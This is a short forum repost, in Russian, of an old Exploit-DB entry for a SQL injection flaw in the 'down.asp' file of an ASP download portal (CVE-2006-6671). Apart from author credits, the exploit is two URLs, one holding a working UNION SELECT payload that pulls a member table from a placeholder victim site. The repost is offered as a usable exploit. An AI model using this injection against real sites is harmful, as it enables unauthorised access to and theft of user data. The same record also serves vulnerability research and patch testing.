Exploit Burak Yilmaz Download Portal - 'down.asp' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
2962
Проверка EDB
  1. Пройдено
Автор
SHAFUCK31
Тип уязвимости
WEBAPPS
Платформа
ASP
CVE
cve-2006-6671
Дата публикации
2006-12-19
Код:
# LiderHack.Org & BhhGroup.Org & Bilgi-Yonetimi.Org.Tr

# script name : Burak Y.lmaz Download Portal

# Script Download : http://maxiasp.com/sc_yorum.asp?scno=929

# Risk : High

# Found By : ShaFuck31

# Thanks : | Dekolax | The RéD | DesquneR | f1r3b0y | BaZaL | SaboTaqe | ST@ReXT | BLaSTER | UNiKnoX |

# Vulnerable file : down.asp

#Vuln :
http://www.victim.com/ScriptPath/down.asp?id=[SqL]
http://www.victim.com/ScriptPath/down.asp?id=-1%20union%20SELECT%20*%20FROM%20uyeler%20WHERE%20uid=36

#Contact: ShaFuq31 (at) HoTMaiL (dot) CoM [email concealed]

# milw0rm.com [2006-12-19]
 
Источник
www.exploit-db.com

Похожие темы